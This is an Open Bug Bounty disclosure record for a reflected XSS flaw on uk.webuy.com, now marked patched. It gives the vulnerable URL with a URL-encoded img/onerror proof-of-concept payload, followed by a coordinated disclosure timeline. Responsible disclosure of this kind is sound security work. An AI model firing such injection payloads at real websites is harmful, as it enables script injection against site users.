uk.webuy.com XSS vulnerability

2017-08-31T13:44:00
ID OBB:285532
Type openbugbounty
Reporter Luke
Modified 2017-10-01T03:39:00

Description

Vulnerable URL:
https://uk.webuy.com/product.php/xss%22%3E%3CiMG%20SRc=X%20onErrOr=prompt(%22OPENBUGBOUNTY%22)%3E/?sku=5039036080255&name;=Boss%20Baby,%20The%20(U)%202017#.WagSnum1uUl
Details:

Description| Value
---|---
Patched:| Yes, at 20.09.2017
Latest check for patch:| 20.09.2017 11:37 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 31 August, 2017 13:44 GMT
Generic security notifications sent to website owner| 31 August, 2017 13:46 GMT
Notification sent to subscribers (without technical details)| 31 August, 2017 14:17 GMT
Vulnerability details disclosed by researcher| 30 September, 2017 14:22 GMT
Vulnerability patched by the website owner| 1 October, 2017 03:39 GMT